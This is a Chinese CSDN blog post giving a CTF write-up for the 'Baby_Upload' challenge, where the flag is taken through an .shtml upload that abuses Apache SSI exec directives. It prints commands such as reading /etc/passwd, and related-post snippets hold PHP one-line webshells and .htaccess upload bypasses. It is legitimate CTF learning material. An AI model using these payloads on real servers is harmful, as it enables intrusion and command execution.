长安战“疫”--Baby_Upload

最新推荐文章于 2022-01-16 10:03:03 发布
最新推荐文章于 2022-01-16 10:03:03 发布
阅读量445 收藏
点赞数
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/122442352
版权

打开后是一个文件上传

 上传图片发现

额....好吧,图片被拦截了
这里用的是 Apache开启SSI,文件上传Getshell

什么是shtml

使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为“服务器端嵌入”或者叫“服务器端包含”,是一种类似于ASP的基于服务器的网页制作技术。

通过SSI的命令实现getshell

程序代码:
<!– 指令名称=”指令参数”>

exec
作用:将某一外部程序的输出插入到页面中
语法:
<!–#exec cmd=”文件名称”–>
参数:
cmd 常规应用程序
示例:
<!-–#exec cmd=”dir”–-> 将会显示当前目录的文件夹和文件
<!–-#exec cmd=”cat /etc/passwd”-–> 将会显示密码文件

列目录:

接下来就是读取flag,发现fffffflllll11111aaaaa4444ggggg被过滤,一些读文件的命令也被过滤了
flag名使用通配符来绕过,读文件命令使用cut

 参考文章:
Apache开启SSI,文件上传Getshell复现_Adminxe的博客-CSDN博客

Uzero.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GXYCTF2019]BabyUpload 1 文件上传
weixin_45577185的博客
07-22 1900
源码: <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"textml; charset=utf-8\" /> <title>Upload</title> <form action=\"\" method=\"post\" enctype=\"multipart/form-data\"> 上传文件<input type=\"file\" name=\"
BUUCTF学习笔记-BabyUpLoad
Emmawas的博客
09-28 714
考点:.htaccess绕过,文件内容为 AddType application/x-httpd-php .jpg,讲jpg文件按照php文件使用
Baby_Upload
ce666666的博客
01-16 257
前言 考点:shtml文件上传 步骤 来到上传页面 图片,.hataccess,.user.ini,图片马这些上传不了 尝试上传shtml shtml:服务器端嵌入,类似ASP的基于服务器的网页制作.支持SSI命令. SSI命令 <!-- 指令名称="指令参数"> 主要指令有include,echo,exec exec指令语法 <!--#exec cmd="文件名称"--> <!--#exec cgi="文件名称"--> 得到ffffff?llll
[HFCTF2020]BabyUpload
qq_43756333的博客
07-04 2803
平台:https://buuoj.cn 打开靶机给出源码,分析一下 <?php error_reporting(0); session_save_path("/var/babyctf/"); session_start(); require_once "/flag"; highlight_file(__FILE__); if($_SESSION['username'] ==='admin') { $filename='/var/babyctf/success.txt'; if(file
[GXYCTF2019]BabyUpload
夜幕下的灯火阑珊的博客
05-13 3347
png文件不许上传,尝试上传jpg 修改后缀名为.htaccess,文件内容为 SetHandler application/x-httpd-php 上传一句话木马 <?php eval($_POST[cmd]);?> 失败,换一种方式 <script language='php'>eval($_POST[cmd]);</script> ...
flat-design-baby-girl-shower_hjjm_baby_
09-28
标题“flat-design-baby-girl-shower_hjjm_baby_”暗示了这是一份与平面设计相关的资源包,特别地,是为一个女婴洗礼或婴儿派对设计的素材。"flat design"是一种流行的设计风格,它强调简洁、二维的视觉元素,通常...
babies-collection-in-hand-drawn-style_baby_
09-29
babies-collection-in-hand-drawn-style vector for cnc router
IRbaby-firmware-0.2_irbaby红外_machineryvpo_IRmqtt_IRbaby_ir-baby_
10-02
《IRbaby固件0.2:打造智能红外遥控器与Homeassistant联动》 IRbaby是一款基于ESP8266微控制器的红外万能遥控器,其固件版本0.2进一步提升了智能家居的集成与控制体验。这个项目的核心是将传统的红外遥控功能与现代...
Baby-master.zip_MVP_baby_java 毕业设计_毕业设计
09-20
【标题】"Baby-master.zip_MVP_baby_java 毕业设计_毕业设计" 提到的是一个基于MVP架构的Java项目,适用于毕业设计。这个项目可能是为了帮助初学者掌握MVP模式在实际开发中的应用,同时作为一个完整的毕业设计作品。...
Flappy-Bird:Flappy Bird的原生Android克隆:front-facing_baby_chick:
05-12
本项目“Flappy-Bird:Flappy Bird的原生Android克隆:front-facing_baby_chick:”则是对这款经典游戏的原生Android版本的克隆,旨在为开发者提供一个学习和参考的平台。项目的核心是使用了强大的libGDX游戏框架,这是...
长安”网络安全赛-wp
qq_45603443的博客
01-11 5383
长安”网络安全赛-wpWebtpshiro?Baby_Uploadflag配送中心flaskRCE_No_ParaCryptono_can_no_bbmathLinearEquationsno_mah_no_cryno_cry_no_canMiscez_Encryptbinary西安加油Ez Steg八卦迷宫无字天书朴实无华的取证Reverselemoncombat_slogancute_dogehello_pyPwnpwn1重点来了 Web tp 文件上传+phar反序列化 <?php nam
信息技术教师技能大赛基础知识与专业技能试卷.doc
08-16
信息技术教师技能大赛基础知识与专业技能试卷.doc
基于ssm的新生报到系统(有报告) Javaee项目,ssm项目
最新发布
08-16
资源详情:https://blog.csdn.net/2302_78191516/article/details/141269772
奥柯玛DC16A电磁炉原理图.rar
08-16
奥柯玛DC16A电磁炉原理图
麒麟 V10 SP1 升级 python 3.7.9 所需 rpm 包
08-16
麒麟 V10 SP1 升级 python 3.7.9 所需 rpm 包 麒麟 V10 SP1 升级 python 3.7.9 所需 rpm 包 麒麟 V10 SP1 升级 python 3.7.9 所需 rpm 包 麒麟 V10 SP1 升级 python 3.7.9 所需 rpm 包 麒麟 V10 SP1 升级 python 3.7.9 所需 rpm 包 麒麟 V10 SP1 升级 python 3.7.9 所需 rpm 包 麒麟 V10 SP1 升级 python 3.7.9 所需 rpm 包 麒麟 V10 SP1 升级 python 3.7.9 所需 rpm 包 麒麟 V10 SP1 升级 python 3.7.9 所需 rpm 包 麒麟 V10 SP1 升级 python 3.7.9 所需 rpm 包
java-学生比赛指导管理系统(源码+数据库+论文).rar
08-16
针对当前高校各类竞赛的报名现状,本文利用JSP技术以及Mysql数据库开发设计一款针对高校比赛指导及报名的线上平台,学生用户可以通过线上平台及时了解到高校内的各类赛事信息及规则,通过页面信息的了解可以实现在线的报名,对于报名审核通过的学生用户可以获得对应的比赛指导资料,利用线上平台帮助更好的提升比赛信息的传播范围以及比赛报名的效率,通过流程化和线上化的平台帮助建立在线的比赛报名及信息传递的平台。 关键词:JSP技术;Mysql数据库;比赛管理;在线报名;
用ESP8266-01S远程物联控制电器的程序
08-16
用ESP8266-01S远程物联控制电器的程序
基于Android任务管理器系统APP设计与实现.docx
08-16
基于Android任务管理器系统APP设计与实现.docx
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码来获取敏感信息或者执行未经授权的操作。 为了详细了解攻防世界-baby_web的攻击和防御方法,我们可以进行以下步骤: 1. 分析源代码:通过查看源代码,我们可以了解应用程序的结构和逻辑,以及可能存在的漏洞点。 2. 注入攻击:尝试使用注入攻击来获取数据库信息或者执行其他恶意操作。可以使用工具如sqlmap来自动化进行注入测试。 3. 防御措施:了解并实施防御措施,如输入验证、参数化查询、安全编码等,以防止注入攻击和其他常见的安全漏洞。 请注意,进行任何形式的攻击都是非法的,除非您是经过授权的安全专家或者在合法的渗透测试环境中进行。在现实世界中,攻击和防御是一个持续的过程,需要不断学习和更新知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值